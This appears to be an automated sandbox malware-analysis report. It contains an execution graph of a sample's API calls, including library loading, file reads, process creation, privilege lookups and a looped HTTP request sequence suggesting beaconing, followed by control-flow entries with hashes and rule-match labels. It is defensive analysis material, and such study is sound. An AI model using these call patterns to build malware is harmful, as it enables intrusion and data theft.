                                          execution_graph 84989 2a8f0fd 84992 2a8b9d0 84989->84992 84993 2a8b9f6 84992->84993 85000 2a79d40 84993->85000 84995 2a8ba02 84996 2a8ba26 84995->84996 85008 2a78f30 84995->85008 85046 2a8a6b0 84996->85046 85050 2a79c90 85000->85050 85002 2a79d4d 85003 2a79d54 85002->85003 85062 2a79c30 85002->85062 85003->84995 85009 2a78f57 85008->85009 85494 2a7b1c0 85009->85494 85011 2a78f69 85498 2a7af10 85011->85498 85013 2a78f86 85022 2a78f8d 85013->85022 85569 2a7ae40 LdrLoadDll 85013->85569 85016 2a78ffc 85514 2a7f410 85016->85514 85018 2a79006 85019 2a8bf90 2 API calls 85018->85019 85042 2a790f2 85018->85042 85020 2a7902a 85019->85020 85021 2a8bf90 2 API calls 85020->85021 85023 2a7903b 85021->85023 85022->85042 85502 2a7f380 85022->85502 85024 2a8bf90 2 API calls 85023->85024 85025 2a7904c 85024->85025 85526 2a7ca90 85025->85526 85027 2a79059 85028 2a84a50 8 API calls 85027->85028 85029 2a79066 85028->85029 85030 2a84a50 8 API calls 85029->85030 85031 2a79077 85030->85031 85032 2a790a5 85031->85032 85033 2a79084 85031->85033 85034 2a84a50 8 API calls 85032->85034 85536 2a7d620 85033->85536 85043 2a790c1 85034->85043 85037 2a790e9 85039 2a78d00 23 API calls 85037->85039 85039->85042 85040 2a79092 85552 2a78d00 85040->85552 85042->84996 85043->85037 85570 2a7d6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 85043->85570 85047 2a8a6b8 85046->85047 85048 2a8af60 LdrLoadDll 85047->85048 85049 2a8a6cf 85048->85049 85082 2a88bc0 85050->85082 85054 2a79cb6 85054->85002 85055 2a79cac 85055->85054 85091 2a8b2b0 85055->85091 85057 2a79cf3 85057->85054 85103 2a79ab0 85057->85103 85059 2a79d13 85109 2a79620 LdrLoadDll 85059->85109 85061 2a79d25 85061->85002 85063 2a79c40 85062->85063 85064 2a8b5a0 LdrLoadDll 85063->85064 85065 2a79c4a 85064->85065 85066 2a8b5a0 LdrLoadDll 85065->85066 85067 2a79c5b 85066->85067 85068 2a8b5a0 LdrLoadDll 85067->85068 85069 2a79c71 85068->85069 85070 2a7f180 85069->85070 85071 2a7f199 85070->85071 85477 2a7b040 85071->85477 85073 2a7f1ac 85481 2a8a1e0 85073->85481 85077 2a7f1d2 85081 2a7f1fd 85077->85081 85487 2a8a260 85077->85487 85079 2a8a490 2 API calls 85080 2a79d65 85079->85080 85080->84995 85081->85079 85083 2a88bcf 85082->85083 85110 2a79c10 85083->85110 85085 2a88bed 85116 2a84e50 85085->85116 85087 2a79ca3 85088 2a88a70 85087->85088 85131 2a8a600 85088->85131 85092 2a79c10 LdrLoadDll 85091->85092 85093 2a8b2c9 85092->85093 85138 2a84a50 85093->85138 85095 2a8b2e1 85096 2a8b2ea 85095->85096 85177 2a8b0f0 85095->85177 85096->85057 85098 2a8b2fe 85098->85096 85195 2a89f00 85098->85195 85455 2a77ea0 85103->85455 85105 2a79ad1 85105->85059 85106 2a79aca 85106->85105 85468 2a78160 85106->85468 85109->85061 85111 2a79c20 85110->85111 85111->85085 85121 2a8b5a0 85111->85121 85114 2a8b5a0 LdrLoadDll 85115 2a79c71 85114->85115 85115->85085 85117 2a84e6a 85116->85117 85118 2a84e5e 85116->85118 85117->85087 85118->85117 85130 2a852d0 LdrLoadDll 85118->85130 85120 2a84fbc 85120->85087 85122 2a8b5c3 85121->85122 85125 2a7acf0 85122->85125 85124 2a79c5b 85124->85114 85127 2a7ad14 85125->85127 85126 2a7ad1b 85126->85124 85127->85126 85128 2a7ad67 85127->85128 85129 2a7ad50 LdrLoadDll 85127->85129 85128->85124 85129->85128 85130->85120 85134 2a8af60 85131->85134 85133 2a88a85 85133->85055 85135 2a8af70 85134->85135 85137 2a8af92 85134->85137 85136 2a84e50 LdrLoadDll 85135->85136 85136->85137 85137->85133 85139 2a84d85 85138->85139 85149 2a84a64 85138->85149 85139->85095 85142 2a84b90 85206 2a8a360 85142->85206 85143 2a84b73 85263 2a8a460 LdrLoadDll 85143->85263 85146 2a84b7d 85146->85095 85147 2a84bb7 85148 2a8bdc0 2 API calls 85147->85148 85151 2a84bc3 85148->85151 85149->85139 85203 2a89c50 85149->85203 85150 2a84d49 85153 2a8a490 2 API calls 85150->85153 85151->85146 85151->85150 85152 2a84d5f 85151->85152 85157 2a84c52 85151->85157 85272 2a84790 LdrLoadDll NtReadFile NtClose 85152->85272 85154 2a84d50 85153->85154 85154->85095 85156 2a84d72 85156->85095 85158 2a84cb9 85157->85158 85159 2a84c61 85157->85159 85158->85150 85160 2a84ccc 85158->85160 85162 2a84c7a 85159->85162 85163 2a84c66 85159->85163 85265 2a8a2e0 85160->85265 85166 2a84c7f 85162->85166 85167 2a84c97 85162->85167 85264 2a84650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 85163->85264 85209 2a846f0 85166->85209 85167->85154 85221 2a84410 85167->85221 85169 2a84c70 85169->85095 85171 2a84d2c 85269 2a8a490 85171->85269 85172 2a84c8d 85172->85095 85175 2a84caf 85175->85095 85176 2a84d38 85176->85095 85178 2a8b101 85177->85178 85179 2a8b113 85178->85179 85293 2a8bd40 85178->85293 85179->85098 85181 2a8b134 85296 2a84070 85181->85296 85183 2a8b180 85183->85098 85184 2a8b157 85184->85183 85185 2a84070 3 API calls 85184->85185 85188 2a8b179 85185->85188 85187 2a8b20a 85189 2a8b21a 85187->85189 85423 2a8af00 LdrLoadDll 85187->85423 85188->85183 85328 2a85390 85188->85328 85339 2a8ad70 85189->85339 85192 2a8b248 85418 2a89ec0 85192->85418 85196 2a89f1c 85195->85196 85197 2a8af60 LdrLoadDll 85195->85197 85449 4d92c0a 85196->85449 85197->85196 85198 2a89f37 85200 2a8bdc0 85198->85200 85201 2a8b359 85200->85201 85452 2a8a670 85200->85452 85201->85057 85204 2a84b44 85203->85204 85205 2a8af60 LdrLoadDll 85203->85205 85204->85142 85204->85143 85204->85146 85205->85204 85207 2a8af60 LdrLoadDll 85206->85207 85208 2a8a37c NtCreateFile 85207->85208 85208->85147 85210 2a8470c 85209->85210 85211 2a8a2e0 LdrLoadDll 85210->85211 85212 2a8472d 85211->85212 85213 2a84748 85212->85213 85214 2a84734 85212->85214 85215 2a8a490 2 API calls 85213->85215 85216 2a8a490 2 API calls 85214->85216 85217 2a84751 85215->85217 85218 2a8473d 85216->85218 85273 2a8bfd0 85217->85273 85218->85172 85220 2a8475c 85220->85172 85222 2a8445b 85221->85222 85223 2a8448e 85221->85223 85224 2a8a2e0 LdrLoadDll 85222->85224 85225 2a845d9 85223->85225 85229 2a844aa 85223->85229 85227 2a84476 85224->85227 85226 2a8a2e0 LdrLoadDll 85225->85226 85233 2a845f4 85226->85233 85228 2a8a490 2 API calls 85227->85228 85230 2a8447f 85228->85230 85231 2a8a2e0 LdrLoadDll 85229->85231 85230->85175 85232 2a844c5 85231->85232 85235 2a844cc 85232->85235 85236 2a844e1 85232->85236 85292 2a8a320 LdrLoadDll 85233->85292 85237 2a8a490 2 API calls 85235->85237 85238 2a844e6 85236->85238 85246 2a844fc 85236->85246 85241 2a844d5 85237->85241 85242 2a8a490 2 API calls 85238->85242 85239 2a8462e 85240 2a8a490 2 API calls 85239->85240 85243 2a84639 85240->85243 85241->85175 85244 2a844ef 85242->85244 85243->85175 85244->85175 85245 2a84501 85250 2a84513 85245->85250 85282 2a8a410 85245->85282 85246->85245 85279 2a8bf90 85246->85279 85249 2a84567 85251 2a8457e 85249->85251 85291 2a8a2a0 LdrLoadDll 85249->85291 85250->85175 85253 2a8459a 85251->85253 85254 2a84585 85251->85254 85256 2a8a490 2 API calls 85253->85256 85255 2a8a490 2 API calls 85254->85255 85255->85250 85257 2a845a3 85256->85257 85258 2a845cf 85257->85258 85286 2a8bb90 85257->85286 85258->85175 85260 2a845ba 85261 2a8bdc0 2 API calls 85260->85261 85262 2a845c3 85261->85262 85262->85175 85263->85146 85264->85169 85266 2a8af60 LdrLoadDll 85265->85266 85267 2a84d14 85266->85267 85268 2a8a320 LdrLoadDll 85267->85268 85268->85171 85270 2a8af60 LdrLoadDll 85269->85270 85271 2a8a4ac NtClose 85270->85271 85271->85176 85272->85156 85276 2a8a630 85273->85276 85275 2a8bfea 85275->85220 85277 2a8af60 LdrLoadDll 85276->85277 85278 2a8a64c RtlAllocateHeap 85277->85278 85278->85275 85280 2a8a630 2 API calls 85279->85280 85281 2a8bfa8 85280->85281 85281->85245 85283 2a8a42c NtReadFile 85282->85283 85284 2a8af60 LdrLoadDll 85282->85284 85283->85249 85284->85283 85287 2a8bb9d 85286->85287 85288 2a8bbb4 85286->85288 85287->85288 85289 2a8bf90 2 API calls 85287->85289 85288->85260 85290 2a8bbcb 85289->85290 85290->85260 85291->85251 85292->85239 85294 2a8bd6d 85293->85294 85424 2a8a540 85293->85424 85294->85181 85297 2a84081 85296->85297 85298 2a84089 85296->85298 85297->85184 85299 2a8435c 85298->85299 85427 2a8cf30 85298->85427 85299->85184 85301 2a840dd 85302 2a8cf30 2 API calls 85301->85302 85305 2a840e8 85302->85305 85303 2a84136 85306 2a8cf30 2 API calls 85303->85306 85305->85303 85307 2a8d060 3 API calls 85305->85307 85441 2a8cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 85305->85441 85309 2a8414a 85306->85309 85307->85305 85308 2a841a7 85310 2a8cf30 2 API calls 85308->85310 85309->85308 85432 2a8d060 85309->85432 85311 2a841bd 85310->85311 85313 2a841fa 85311->85313 85315 2a8d060 3 API calls 85311->85315 85314 2a8cf30 2 API calls 85313->85314 85316 2a84205 85314->85316 85315->85311 85317 2a8d060 3 API calls 85316->85317 85323 2a8423f 85316->85323 85317->85316 85320 2a8cf90 2 API calls 85321 2a8433e 85320->85321 85322 2a8cf90 2 API calls 85321->85322 85324 2a84348 85322->85324 85438 2a8cf90 85323->85438 85325 2a8cf90 2 API calls 85324->85325 85326 2a84352 85325->85326 85327 2a8cf90 2 API calls 85326->85327 85327->85299 85329 2a79c10 LdrLoadDll 85328->85329 85330 2a853a1 85329->85330 85331 2a84a50 8 API calls 85330->85331 85333 2a853b7 85331->85333 85332 2a8540a 85332->85187 85333->85332 85334 2a853f2 85333->85334 85335 2a85405 85333->85335 85336 2a8bdc0 2 API calls 85334->85336 85337 2a8bdc0 2 API calls 85335->85337 85338 2a853f7 85336->85338 85337->85332 85338->85187 85340 2a8ad84 85339->85340 85341 2a8ac30 LdrLoadDll 85339->85341 85442 2a8ac30 85340->85442 85341->85340 85344 2a8ac30 LdrLoadDll 85345 2a8ad96 85344->85345 85346 2a8ac30 LdrLoadDll 85345->85346 85347 2a8ad9f 85346->85347 85348 2a8ac30 LdrLoadDll 85347->85348 85349 2a8ada8 85348->85349 85350 2a8ac30 LdrLoadDll 85349->85350 85351 2a8adb1 85350->85351 85352 2a8ac30 LdrLoadDll 85351->85352 85353 2a8adbd 85352->85353 85354 2a8ac30 LdrLoadDll 85353->85354 85355 2a8adc6 85354->85355 85356 2a8ac30 LdrLoadDll 85355->85356 85357 2a8adcf 85356->85357 85358 2a8ac30 LdrLoadDll 85357->85358 85359 2a8add8 85358->85359 85360 2a8ac30 LdrLoadDll 85359->85360 85361 2a8ade1 85360->85361 85362 2a8ac30 LdrLoadDll 85361->85362 85363 2a8adea 85362->85363 85364 2a8ac30 LdrLoadDll 85363->85364 85365 2a8adf6 85364->85365 85366 2a8ac30 LdrLoadDll 85365->85366 85367 2a8adff 85366->85367 85368 2a8ac30 LdrLoadDll 85367->85368 85369 2a8ae08 85368->85369 85370 2a8ac30 LdrLoadDll 85369->85370 85371 2a8ae11 85370->85371 85372 2a8ac30 LdrLoadDll 85371->85372 85373 2a8ae1a 85372->85373 85374 2a8ac30 LdrLoadDll 85373->85374 85375 2a8ae23 85374->85375 85376 2a8ac30 LdrLoadDll 85375->85376 85377 2a8ae2f 85376->85377 85378 2a8ac30 LdrLoadDll 85377->85378 85379 2a8ae38 85378->85379 85380 2a8ac30 LdrLoadDll 85379->85380 85381 2a8ae41 85380->85381 85382 2a8ac30 LdrLoadDll 85381->85382 85383 2a8ae4a 85382->85383 85384 2a8ac30 LdrLoadDll 85383->85384 85385 2a8ae53 85384->85385 85386 2a8ac30 LdrLoadDll 85385->85386 85387 2a8ae5c 85386->85387 85388 2a8ac30 LdrLoadDll 85387->85388 85389 2a8ae68 85388->85389 85390 2a8ac30 LdrLoadDll 85389->85390 85391 2a8ae71 85390->85391 85392 2a8ac30 LdrLoadDll 85391->85392 85393 2a8ae7a 85392->85393 85394 2a8ac30 LdrLoadDll 85393->85394 85395 2a8ae83 85394->85395 85396 2a8ac30 LdrLoadDll 85395->85396 85397 2a8ae8c 85396->85397 85398 2a8ac30 LdrLoadDll 85397->85398 85399 2a8ae95 85398->85399 85400 2a8ac30 LdrLoadDll 85399->85400 85401 2a8aea1 85400->85401 85402 2a8ac30 LdrLoadDll 85401->85402 85403 2a8aeaa 85402->85403 85404 2a8ac30 LdrLoadDll 85403->85404 85405 2a8aeb3 85404->85405 85406 2a8ac30 LdrLoadDll 85405->85406 85407 2a8aebc 85406->85407 85408 2a8ac30 LdrLoadDll 85407->85408 85409 2a8aec5 85408->85409 85410 2a8ac30 LdrLoadDll 85409->85410 85411 2a8aece 85410->85411 85412 2a8ac30 LdrLoadDll 85411->85412 85413 2a8aeda 85412->85413 85414 2a8ac30 LdrLoadDll 85413->85414 85415 2a8aee3 85414->85415 85416 2a8ac30 LdrLoadDll 85415->85416 85417 2a8aeec 85416->85417 85417->85192 85419 2a8af60 LdrLoadDll 85418->85419 85420 2a89edc 85419->85420 85448 4d92df0 LdrInitializeThunk 85420->85448 85421 2a89ef3 85421->85098 85423->85189 85425 2a8a55c NtAllocateVirtualMemory 85424->85425 85426 2a8af60 LdrLoadDll 85424->85426 85425->85294 85426->85425 85428 2a8cf40 85427->85428 85429 2a8cf46 85427->85429 85428->85301 85430 2a8bf90 2 API calls 85429->85430 85431 2a8cf6c 85430->85431 85431->85301 85433 2a8cfd0 85432->85433 85434 2a8d02d 85433->85434 85435 2a8bf90 2 API calls 85433->85435 85434->85309 85436 2a8d00a 85435->85436 85437 2a8bdc0 2 API calls 85436->85437 85437->85434 85439 2a84334 85438->85439 85440 2a8bdc0 2 API calls 85438->85440 85439->85320 85440->85439 85441->85305 85443 2a8ac4b 85442->85443 85444 2a84e50 LdrLoadDll 85443->85444 85445 2a8ac6b 85444->85445 85446 2a84e50 LdrLoadDll 85445->85446 85447 2a8ad17 85445->85447 85446->85447 85447->85344 85448->85421 85450 4d92c1f LdrInitializeThunk 85449->85450 85451 4d92c11 85449->85451 85450->85198 85451->85198 85453 2a8af60 LdrLoadDll 85452->85453 85454 2a8a68c RtlFreeHeap 85453->85454 85454->85201 85456 2a77eb0 85455->85456 85457 2a77eab 85455->85457 85458 2a8bd40 2 API calls 85456->85458 85457->85106 85459 2a77ed5 85458->85459 85460 2a77f38 85459->85460 85461 2a89ec0 2 API calls 85459->85461 85462 2a77f3e 85459->85462 85466 2a8bd40 2 API calls 85459->85466 85471 2a8a5c0 85459->85471 85460->85106 85461->85459 85464 2a77f64 85462->85464 85465 2a8a5c0 2 API calls 85462->85465 85464->85106 85467 2a77f55 85465->85467 85466->85459 85467->85106 85469 2a8a5c0 2 API calls 85468->85469 85470 2a7817e 85469->85470 85470->85059 85472 2a8a5dc 85471->85472 85473 2a8af60 LdrLoadDll 85471->85473 85476 4d92c70 LdrInitializeThunk 85472->85476 85473->85472 85474 2a8a5f3 85474->85459 85476->85474 85478 2a7b055 85477->85478 85480 2a7b0e0 85478->85480 85492 2a89c90 LdrLoadDll 85478->85492 85480->85073 85482 2a8af60 LdrLoadDll 85481->85482 85483 2a7f1bb 85482->85483 85483->85080 85484 2a8a7d0 85483->85484 85485 2a8af60 LdrLoadDll 85484->85485 85486 2a8a7ef LookupPrivilegeValueW 85485->85486 85486->85077 85488 2a8af60 LdrLoadDll 85487->85488 85489 2a8a27c 85488->85489 85493 4d92ea0 LdrInitializeThunk 85489->85493 85490 2a8a29b 85490->85081 85492->85480 85493->85490 85495 2a7b1f0 85494->85495 85496 2a7b040 LdrLoadDll 85495->85496 85497 2a7b204 85496->85497 85497->85011 85499 2a7af34 85498->85499 85571 2a89c90 LdrLoadDll 85499->85571 85501 2a7af6e 85501->85013 85503 2a7f3ac 85502->85503 85504 2a7b1c0 LdrLoadDll 85503->85504 85505 2a7f3be 85504->85505 85572 2a7f290 85505->85572 85508 2a7f3f1 85511 2a7f402 85508->85511 85513 2a8a490 2 API calls 85508->85513 85509 2a7f3d9 85510 2a7f3e4 85509->85510 85512 2a8a490 2 API calls 85509->85512 85510->85016 85511->85016 85512->85510 85513->85511 85515 2a7f43c 85514->85515 85591 2a7b2b0 85515->85591 85517 2a7f44e 85518 2a7f290 3 API calls 85517->85518 85519 2a7f45f 85518->85519 85520 2a7f469 85519->85520 85522 2a7f481 85519->85522 85523 2a8a490 2 API calls 85520->85523 85524 2a7f474 85520->85524 85521 2a7f492 85521->85018 85522->85521 85525 2a8a490 2 API calls 85522->85525 85523->85524 85524->85018 85525->85521 85527 2a7caa6 85526->85527 85528 2a7cab0 85526->85528 85527->85027 85529 2a7af10 LdrLoadDll 85528->85529 85530 2a7cb4e 85529->85530 85531 2a7cb74 85530->85531 85532 2a7b040 LdrLoadDll 85530->85532 85531->85027 85533 2a7cb90 85532->85533 85534 2a84a50 8 API calls 85533->85534 85535 2a7cbe5 85534->85535 85535->85027 85537 2a7d646 85536->85537 85538 2a7b040 LdrLoadDll 85537->85538 85539 2a7d65a 85538->85539 85595 2a7d310 85539->85595 85541 2a7908b 85542 2a7cc00 85541->85542 85543 2a7cc26 85542->85543 85544 2a7b040 LdrLoadDll 85543->85544 85545 2a7cca9 85543->85545 85544->85545 85546 2a7b040 LdrLoadDll 85545->85546 85547 2a7cd16 85546->85547 85548 2a7af10 LdrLoadDll 85547->85548 85549 2a7cd7f 85548->85549 85550 2a7b040 LdrLoadDll 85549->85550 85551 2a7ce2f 85550->85551 85551->85040 85554 2a78d14 85552->85554 85626 2a7f6d0 85552->85626 85565 2a78f25 85554->85565 85631 2a843a0 85554->85631 85556 2a78d70 85556->85565 85634 2a78ab0 85556->85634 85559 2a8cf30 2 API calls 85560 2a78db2 85559->85560 85561 2a8d060 3 API calls 85560->85561 85566 2a78dc7 85561->85566 85562 2a77ea0 4 API calls 85562->85566 85565->84996 85566->85562 85566->85565 85567 2a78160 2 API calls 85566->85567 85568 2a7c7b0 18 API calls 85566->85568 85640 2a7f670 85566->85640 85644 2a7f080 21 API calls 85566->85644 85567->85566 85568->85566 85569->85022 85570->85037 85571->85501 85573 2a7f2aa 85572->85573 85581 2a7f360 85572->85581 85574 2a7b040 LdrLoadDll 85573->85574 85575 2a7f2cc 85574->85575 85582 2a89f40 85575->85582 85577 2a7f30e 85585 2a89f80 85577->85585 85580 2a8a490 2 API calls 85580->85581 85581->85508 85581->85509 85583 2a8af60 LdrLoadDll 85582->85583 85584 2a89f5c 85583->85584 85584->85577 85586 2a8af60 LdrLoadDll 85585->85586 85587 2a89f9c 85586->85587 85590 4d935c0 LdrInitializeThunk 85587->85590 85588 2a7f354 85588->85580 85590->85588 85592 2a7b2d7 85591->85592 85593 2a7b040 LdrLoadDll 85592->85593 85594 2a7b313 85593->85594 85594->85517 85596 2a7d327 85595->85596 85604 2a7f710 85596->85604 85600 2a7d39b 85601 2a7d3a2 85600->85601 85617 2a8a2a0 LdrLoadDll 85600->85617 85601->85541 85603 2a7d3b5 85603->85541 85605 2a7f735 85604->85605 85606 2a79c10 LdrLoadDll 85605->85606 85607 2a7f740 85606->85607 85618 2a781a0 85607->85618 85609 2a7d36f 85614 2a8a6e0 85609->85614 85610 2a7f759 85610->85609 85611 2a84a50 8 API calls 85610->85611 85613 2a8bdc0 2 API calls 85610->85613 85625 2a7f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 85610->85625 85611->85610 85613->85610 85615 2a8af60 LdrLoadDll 85614->85615 85616 2a8a6ff CreateProcessInternalW 85615->85616 85616->85600 85617->85603 85619 2a7829f 85618->85619 85620 2a781b5 85618->85620 85619->85610 85620->85619 85621 2a84a50 8 API calls 85620->85621 85622 2a78222 85621->85622 85623 2a8bdc0 2 API calls 85622->85623 85624 2a78249 85622->85624 85623->85624 85624->85610 85625->85610 85627 2a84e50 LdrLoadDll 85626->85627 85628 2a7f6ef 85627->85628 85629 2a7f6f6 SetErrorMode 85628->85629 85630 2a7f6fd 85628->85630 85629->85630 85630->85554 85645 2a7f4a0 85631->85645 85633 2a843c6 85633->85556 85635 2a78ab6 85634->85635 85636 2a8bd40 2 API calls 85635->85636 85637 2a78ad5 85636->85637 85638 2a78cea 85637->85638 85664 2a89880 85637->85664 85638->85559 85641 2a7f683 85640->85641 85712 2a89e90 85641->85712 85644->85566 85646 2a7f4bd 85645->85646 85652 2a89fc0 85646->85652 85649 2a7f505 85649->85633 85653 2a8af60 LdrLoadDll 85652->85653 85654 2a89fdc 85653->85654 85655 2a7f4fe 85654->85655 85662 4d92f30 LdrInitializeThunk 85654->85662 85655->85649 85657 2a8a010 85655->85657 85658 2a8a02c 85657->85658 85659 2a8af60 LdrLoadDll 85657->85659 85663 4d92d10 LdrInitializeThunk 85658->85663 85659->85658 85660 2a7f52e 85660->85633 85662->85655 85663->85660 85665 2a8bf90 2 API calls 85664->85665 85666 2a89897 85665->85666 85685 2a79310 85666->85685 85668 2a898b2 85669 2a898d9 85668->85669 85670 2a898f0 85668->85670 85671 2a8bdc0 2 API calls 85669->85671 85673 2a8bd40 2 API calls 85670->85673 85672 2a898e6 85671->85672 85672->85638 85674 2a8992a 85673->85674 85675 2a8bd40 2 API calls 85674->85675 85676 2a89943 85675->85676 85682 2a89be4 85676->85682 85691 2a8bd80 LdrLoadDll 85676->85691 85678 2a89bc9 85679 2a89bd0 85678->85679 85678->85682 85680 2a8bdc0 2 API calls 85679->85680 85681 2a89bda 85680->85681 85681->85638 85683 2a8bdc0 2 API calls 85682->85683 85684 2a89c39 85683->85684 85684->85638 85686 2a79335 85685->85686 85687 2a7acf0 LdrLoadDll 85686->85687 85688 2a79368 85687->85688 85690 2a7938d 85688->85690 85692 2a7cf20 85688->85692 85690->85668 85691->85678 85693 2a7cf4c 85692->85693 85694 2a8a1e0 LdrLoadDll 85693->85694 85695 2a7cf65 85694->85695 85696 2a7cf6c 85695->85696 85703 2a8a220 85695->85703 85696->85690 85700 2a7cfa7 85701 2a8a490 2 API calls 85700->85701 85702 2a7cfca 85701->85702 85702->85690 85704 2a8af60 LdrLoadDll 85703->85704 85705 2a8a23c 85704->85705 85711 4d92ca0 LdrInitializeThunk 85705->85711 85706 2a7cf8f 85706->85696 85708 2a8a810 85706->85708 85709 2a8a82f 85708->85709 85710 2a8af60 LdrLoadDll 85708->85710 85709->85700 85710->85709 85711->85706 85713 2a89eac 85712->85713 85714 2a8af60 LdrLoadDll 85712->85714 85717 4d92dd0 LdrInitializeThunk 85713->85717 85714->85713 85715 2a7f6ae 85715->85566 85717->85715 85718 2a89080 85719 2a8bd40 2 API calls 85718->85719 85721 2a890bb 85719->85721 85720 2a8919c 85721->85720 85722 2a7acf0 LdrLoadDll 85721->85722 85723 2a890f1 85722->85723 85724 2a84e50 LdrLoadDll 85723->85724 85726 2a8910d 85724->85726 85725 2a89120 Sleep 85725->85726 85726->85720 85726->85725 85729 2a88ca0 85726->85729 85751 2a88eb0 LdrLoadDll InternetOpenA InternetConnectA HttpOpenRequestA HttpSendRequestA 85726->85751 85730 2a88cc5 85729->85730 85732 2a88d1f 85730->85732 85752 2a8a980 85730->85752 85746 2a88e83 85732->85746 85757 2a8a9f0 85732->85757 85734 2a88d60 85734->85746 85762 2a8aa70 85734->85762 85736 2a88d8d 85737 2a88d96 85736->85737 85738 2a88da7 85736->85738 85772 2a8abd0 LdrLoadDll 85737->85772 85767 2a8aaf0 85738->85767 85741 2a88d9d 85741->85726 85742 2a88e69 85775 2a8abd0 LdrLoadDll 85742->85775 85744 2a88e7c 85776 2a8abd0 LdrLoadDll 85744->85776 85746->85726 85748 2a88db6 85748->85742 85773 2a8ab60 LdrLoadDll 85748->85773 85749 2a88e36 85749->85742 85774 2a8ab60 LdrLoadDll 85749->85774 85751->85726 85777 2a8b010 85752->85777 85755 2a8a9de 85755->85732 85756 2a8a9c3 InternetOpenA 85756->85732 85758 2a8b010 LdrLoadDll 85757->85758 85759 2a8aa2f 85758->85759 85760 2a8aa38 InternetConnectA 85759->85760 85761 2a8aa5f 85759->85761 85760->85734 85761->85734 85763 2a8aaaf 85762->85763 85764 2a8b010 LdrLoadDll 85762->85764 85765 2a8aab8 HttpOpenRequestA 85763->85765 85766 2a8aadf 85763->85766 85764->85763 85765->85736 85766->85736 85768 2a8ab2f 85767->85768 85769 2a8b010 LdrLoadDll 85767->85769 85770 2a8ab38 HttpSendRequestA 85768->85770 85771 2a8ab53 85768->85771 85769->85768 85770->85748 85771->85748 85772->85741 85773->85749 85774->85749 85775->85744 85776->85746 85778 2a8b01c 85777->85778 85779 2a8a9ba 85777->85779 85780 2a84e50 LdrLoadDll 85778->85780 85779->85755 85779->85756 85780->85779 85781 4d92ad0 LdrInitializeThunk

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 371 2a8a3b3-2a8a3b8 372 2a8a438-2a8a459 NtReadFile 371->372 373 2a8a3ba-2a8a3bd 371->373 374 2a8a379-2a8a3b1 NtCreateFile 373->374 375 2a8a3bf 373->375 375->372
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02A84BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02A84BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02A8A3AD
                                          • NtReadFile.NTDLL(02A84D72,5EB65239,FFFFFFFF,02A84A31,?,?,02A84D72,?,02A84A31,FFFFFFFF,5EB65239,02A84D72,?,00000000), ref: 02A8A455
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CreateRead
                                          • String ID: .z`
                                          • API String ID: 3388366904-1441809116
                                          • Opcode ID: f16dc8ec78ee18e4b4e332de7d6279e4c7a43d9cebd6b93770f34f28afd72ab6
                                          • Instruction ID: a2a245f54362b0146e4e5f812d5a8435fc61a65b4131b6d4838a7d993d720b96
                                          • Opcode Fuzzy Hash: f16dc8ec78ee18e4b4e332de7d6279e4c7a43d9cebd6b93770f34f28afd72ab6
                                          • Instruction Fuzzy Hash: 330192B2214449AFCB48DF98E890CAB77EDAF8C614B158649FA4CC7215D634E811CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02A84BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02A84BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02A8A3AD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: .z`
                                          • API String ID: 823142352-1441809116
                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                          • Instruction ID: 8180bdac44d08e63e64bbc0391753be232d9129924e9b4fb567af5dace9fdb97
                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                          • Instruction Fuzzy Hash: E3F0B2B2200208ABCB08DF88DC84EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtReadFile.NTDLL(02A84D72,5EB65239,FFFFFFFF,02A84A31,?,?,02A84D72,?,02A84A31,FFFFFFFF,5EB65239,02A84D72,?,00000000), ref: 02A8A455
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                          • Instruction ID: 6c2e30d1831c30989310316f8be7c05d895901f7f67e928fc58d0334f10a91b0
                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                          • Instruction Fuzzy Hash: 70F0A4B2200208ABCB14DF89DC80EEB77ADEF8C754F158249BA1D97241DA30E8118BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtReadFile.NTDLL(02A84D72,5EB65239,FFFFFFFF,02A84A31,?,?,02A84D72,?,02A84A31,FFFFFFFF,5EB65239,02A84D72,?,00000000), ref: 02A8A455
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
